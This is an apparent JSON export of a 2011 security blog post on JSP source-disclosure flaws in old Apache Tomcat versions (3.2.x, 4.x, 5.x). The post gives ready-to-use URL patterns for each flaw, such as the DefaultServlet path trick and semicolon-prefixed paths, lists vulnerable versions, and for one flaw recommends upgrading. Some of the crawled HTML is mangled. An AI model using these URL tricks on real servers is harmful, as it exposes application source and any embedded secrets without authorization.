{"id":180,"date":"2011-01-10T22:03:06","date_gmt":"2011-01-10T21:03:06","guid":{"rendered":"https:\/\/thebc.ch\/blog\/?p=180"},"modified":"2013-02-01T13:18:26","modified_gmt":"2013-02-01T12:18:26","slug":"attacking-apache-tomcat-jsp","status":"publish","type":"post","link":"https:\/\/thebc.ch\/blog\/?p=180","title":{"rendered":"Attacking Apache Tomcat JSP"},"content":{"rendered":"<span id=\"Try_to_get_the_source\"><h3>Try to get the source<\/h3><\/span>\n<p>Apache Software Foundation Tomcat 3.2.4 Apache Software Foundation Tomcat 3.2.3<\/p>\n<pre><a title=\"http:\/\/example.com:80\/examples\/jsp\/source.jsp\" href=\"http:\/\/example.com\/examples\/jsp\/source.jsp\" rel=\"nofollow\">http:\/\/example.com:80\/examples\/jsp\/source.jsp<\/a>??\r\n<a title=\"http:\/\/example.com:80\/examples\/jsp\/source.jsp?\/jsp\/\" href=\"http:\/\/example.com\/examples\/jsp\/source.jsp?\/jsp\/\" rel=\"nofollow\">http:\/\/example.com:80\/examples\/jsp\/source.jsp?\/jsp\/<\/a><\/pre>\n<p>href=&#8221;<a title=\"http:\/\/localhost\/serendipity\/from%20http:\/\/www.securityfocus.com\/bid\/4876\/exploit\" href=\"http:\/\/localhost\/serendipity\/from%20http:\/\/www.securityfocus.com\/bid\/4876\/exploit\" rel=\"nofollow\">http:\/\/localhost\/serendipity\/from%20http:\/\/www.securityfocus.com\/bid\/4876\/exploit<\/a>&#8220;&gt;<span style=\"font-size: xx-small;\"><a title=\"http:\/\/www.securityfocus.com\/bid\/4876\/exploit\" href=\"http:\/\/www.securityfocus.com\/bid\/4876\/exploit\" rel=\"nofollow\">http:\/\/www.securityfocus.com\/bid\/4876\/exploit<\/a><\/span>&lt;\/a&gt;&lt;\/blockquote&gt;<\/p>\n<p>Apache Software Foundation Tomcat 4.X<\/p>\n<p>[SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability<\/p>\n<p><span><br \/>\n<a id=\"2._Details\" name=\"2._Details\"><\/a><\/span><\/p>\n<span id=\"Details\"><h3>2. Details<\/h3><\/span>\n<p>Let say you have valid URL like<\/p>\n<pre><a title=\"http:\/\/my.site\/login.jsp\" href=\"http:\/\/my.site\/login.jsp\" rel=\"nofollow\">http:\/\/my.site\/login.jsp<\/a><\/pre>\n<p>then an URL like<\/p>\n<pre><a title=\"http:\/\/my.site\/servlet\/org.apache.catalina.servlets.DefaultServlet\/login.jsp\" href=\"http:\/\/my.site\/servlet\/org.apache.catalina.servlets.DefaultServlet\/login.jsp\" rel=\"nofollow\">http:\/\/my.site\/servlet\/org.apache.catalina.servlets.DefaultServlet\/login.jsp<\/a><\/pre>\n<p>will give you the source code of the JSP page. The full syntaxes of the exposure URL is:<\/p>\n<pre><a title=\"http:\/\/{server}\" href=\"http:\/\/%7bserver%7d\/\" rel=\"nofollow\">http:\/\/{server}<\/a>[:port]\/[Context\/]org.apache.catalina.servlets.Default\r\nServlet\/[context_relative_path\/]file_name.jsp<\/pre>\n<p>For example to see the JSP source of Tomcat 4.1.10 admin application<\/p>\n<p><a title=\"http:\/\/localhost:8080\/admin\/index.jsp\" href=\"http:\/\/localhost:8080\/admin\/index.jsp\" rel=\"nofollow\">http:\/\/localhost:8080\/admin\/index.jsp<\/a><\/p>\n<p>execute<\/p>\n<p><a title=\"http:\/\/localhost:8080\/admin\/servlet\/org.apache.catalina.servlets.DefaultServlet\/index.jsp\" href=\"http:\/\/localhost:8080\/admin\/servlet\/org.apache.catalina.servlets.DefaultServlet\/index.jsp\" rel=\"nofollow\">http:\/\/localhost:8080\/admin\/servlet\/org.apache.catalina.servlets.DefaultServlet\/index.jsp<\/a><br \/>\n&lt;a href=&#8221;<a title=\"http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2\" href=\"http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2\" rel=\"nofollow\">http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2<\/a>&#8220;&gt;<span style=\"font-size: xx-small;\"><a title=\"http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2\" href=\"http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2\" rel=\"nofollow\">http:\/\/marc.theaimsgroup.com\/?l=tomcat-user&amp;m=103417249925541&amp;w=2<\/a><\/span>&lt;\/a&gt;<\/p>\n<p>&nbsp;<\/p>\n<hr size=\"2\" \/>\n<p><strong>Vulnerable Systems:<\/strong><br \/>\n* Apache Tomcat version 5.0.28<br \/>\n* Apache Tomcat version 5.5.12<br \/>\n* Apache Tomcat version 5.5.9<br \/>\n* Apache Tomcat version 5.5.7<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Immune Systems:<\/strong><br \/>\n* Apache Tomcat version 5.5.17<\/p>\n<p><strong>Examples:<\/strong><br \/>\nThe following URLs will trigger the vulnerability:<br \/>\n<em><a title=\"http:\/\/www.sitexyz.com\/;index.jsp\" href=\"http:\/\/www.sitexyz.com\/;index.jsp\" rel=\"nofollow\">http:\/\/www.sitexyz.com\/;index.jsp<\/a><br \/>\n<a title=\"http:\/\/www.sitexyz.com\/help\/;help.do\" href=\"http:\/\/www.sitexyz.com\/help\/;help.do\" rel=\"nofollow\">http:\/\/www.sitexyz.com\/help\/;help.do<\/a><\/em><\/p>\n<p><strong>Solution:<\/strong><br \/>\nUpgrade to the latest stable Tomcat release. Confirmed fix is available in Apache Tomcat version 5.5.17.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Try to get the source Apache Software Foundation Tomcat 3.2.4 Apache Software Foundation Tomcat 3.2.3 http:\/\/example.com:80\/examples\/jsp\/source.jsp?? http:\/\/example.com:80\/examples\/jsp\/source.jsp?\/jsp\/ href=&#8221;http:\/\/localhost\/serendipity\/from%20http:\/\/www.securityfocus.com\/bid\/4876\/exploit&#8220;&gt;http:\/\/www.securityfocus.com\/bid\/4876\/exploit&lt;\/a&gt;&lt;\/blockquote&gt; Apache Software Foundation Tomcat 4.X [SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability 2. Details Let say you have valid URL like &hellip; <a href=\"https:\/\/thebc.ch\/blog\/?p=180\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-180","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/180","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=180"}],"version-history":[{"count":13,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/180\/revisions"}],"predecessor-version":[{"id":2740,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=\/wp\/v2\/posts\/180\/revisions\/2740"}],"wp:attachment":[{"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=180"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=180"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thebc.ch\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=180"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}